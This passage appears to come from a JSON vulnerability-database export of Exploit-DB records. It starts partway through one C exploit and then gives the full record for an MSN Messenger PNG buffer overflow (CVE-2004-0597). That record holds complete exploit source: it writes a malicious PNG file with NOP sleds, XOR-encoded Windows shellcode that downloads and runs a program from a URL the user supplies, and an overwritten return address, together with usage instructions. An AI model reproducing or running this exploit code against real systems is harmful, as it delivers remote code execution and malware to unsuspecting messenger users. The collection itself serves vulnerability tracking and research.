\r\n\r\n /* create the file */ \r\n if( (fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0666)) < 0) \r\n die(\"open\"); \r\n if(write(fd, buf, len) != len) \r\n die(\"write\"); \r\n close(fd); \r\n \r\n return 0; \r\n}\n\n// milw0rm.com [2004-08-11]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/389/"}, {"lastseen": "2016-02-03T00:38:04", "description": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability. CVE-2004-0597. Remote exploit for windows platform", "published": "2005-02-08T00:00:00", "type": "exploitdb", "title": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2005-02-08T00:00:00", "id": "EDB-ID:25094", "href": "https://www.exploit-db.com/exploits/25094/", "sourceData": "source: http://www.securityfocus.com/bid/12506/info\r\n\r\nA remotely exploitable buffer overflow exists in MSN Messenger and Windows Messenger. This vulnerability is related to parsing of Portable Network Graphics (PNG) image header data. Successful exploitation will result in execution of arbitrary code in the context of the vulnerable client user.\r\n\r\nAttack vectors and mitigations may differ for MSN Messenger and Windows Messenger. For Windows Messenger, the attacker must spoof the .NET Messenger service and the client must be configured to receive .NET alerts.\r\n\r\nHowever, MSN Messenger may be exploited through various methods in a client-to-client attack. Possible attack vectors for this vulnerability in MSN Messenger include:\r\nUser display pictures\r\nCustom icons that are displayed inline in instant messages\r\nThumbnails of transferred images\r\nBackground images\r\n\r\nSince this issue may be exploited in a client-to-client attack for MSN Messenger, it is a likely candidate for development of a worm.\r\n\r\n/*\r\n*\r\n* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\r\n* Bug discoveried by Core Security Technologies (www.coresecurity.com)\r\n* Exploit coded By ATmaCA\r\n* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\r\n* Web: http://www.atmacasoft.com\r\n* E-Mail: atmaca@icqmail.com\r\n* Credit to kozan and delikon\r\n* Usage:exploit <OutputPath> <Url>\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* Tested with MSN Messenger 6.2.0137\r\n* This vulnerability can be exploited on Windows 2000 (all service packs)\r\n* and Windows XP (all service packs) that run vulnerable\r\n* clients of MSN Messenger.\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* After creating vuln png image, open\r\n* MSN Messenger and select it as your display picture in\r\n* \"Tools->Change Display Picture\".\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <conio.h>\r\n#include <string.h>\r\n\r\n\r\n#ifdef __BORLANDC__\r\n #include <mem.h>\r\n#endif\r\n\r\n#define NOP 0x90\r\n\r\nchar png_header[] =\r\n\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\"\r\n\"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x03\\x00\\x00\\x00\\x9D\\xB7\\x81\"\r\n\"\\xEC\\x00\\x00\\x01\\xB9\\x74\\x52\\x4E\\x53\";\r\n\r\nchar pngeof[] = \"\\x90\\x90\\x90\\x59\\xE8\\x47\\xFE\\xFF\\xFF\";\r\n\r\n/* Generic win32 http download shellcode\r\n xored with 0x1d by delikon (http://delikon.de/) */\r\nchar shellcode[] = \"\\xEB\"\r\n\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"\r\n\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"\r\n\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"\r\n\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"\r\n\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"\r\n\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"\r\n\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"\r\n\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"\r\n\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"\r\n\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"\r\n\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"\r\n\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"\r\n\"\\x78\\x65\\x78\\x1D\";\r\n\r\nFILE *di;\r\nint i = 0;\r\nshort int weblength;\r\nchar *web;\r\nchar *pointer = NULL;\r\nchar *newshellcode;\r\n\r\n/*xor cryptor*/\r\nchar *Sifrele(char *Name1)\r\n{\r\n char *Name=Name1;\r\n char xor=0x1d;\r\n int Size=strlen(Name);\r\n for(i=0;i<Size;i++)\r\n Name[i]=Name[i]^xor;\r\n return Name;\r\n}\r\n\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\r\n if (argc < 3)\r\n {\r\n printf(\"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\\n\");\r\n printf(\"Bug discoveried by Core Security Technologies (www.coresecurity.com)\\n\");\r\n printf(\"Exploit coded By ATmaCA\\n\");\r\n printf(\"Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\\n\");\r\n printf(\"Web: http://www.atmacasoft.com\\n\");\r\n printf(\"E-Mail: atmaca@icqmail.com\\n\");\r\n printf(\"Credit to kozan and delikon\\n\\n\");\r\n printf(\"\\tUsage:exploit <OutputPath> <Url>\\n\");\r\n printf(\"\\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\\n\");\r\n\r\n return;\r\n }\r\n\r\n\r\n web = argv[2];\r\n\r\n\r\n if( (di=fopen(argv[1],\"wb\")) == NULL )\r\n {\r\n printf(\"Error opening file!\\n\");\r\n return;\r\n }\r\n for(i=0;i<sizeof(png_header)-1;i++)\r\n fputc(png_header[i],di);\r\n\r\n /*stuff in a couple of NOPs*/\r\n for(i=0;i<99;i++)\r\n fputc(NOP,di);\r\n\r\n weblength=(short int)0xff22;\r\n pointer=strstr(shellcode,\"\\x22\\xff\");\r\n weblength-=strlen(web)+1;\r\n memcpy(pointer,&weblength,2);\r\n newshellcode = new char[sizeof(shellcode)+strlen(web)+1];\r\n strcpy(newshellcode,shellcode);\r\n strcat(newshellcode,Sifrele(web));\r\n strcat(newshellcode,\"\\x1d\");\r\n\r\n //shell code\r\n for(i=0;i<strlen(newshellcode);i++)\r\n fputc(newshellcode[i],di);\r\n\r\n\r\n for(i=0;i<(83-strlen(web));i++) //NOPs\r\n fputc(NOP,di);\r\n\r\n /*Overwriting the return address (EIP)*/\r\n /*0x005E0547 - ret */\r\n fputc(0x47,di);\r\n fputc(0x05,di);\r\n fputc(0x5e,di);\r\n fputc(0x00,di);\r\n\r\n for(i=0;i<sizeof(pngeof)-1;i++)\r\n fputc(pngeof[i],di);\r\n\r\n printf(\"Vulnarable png file %s has been generated!\\n\",argv[1]);\r\n\r\n fclose(di);\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25094/"}]}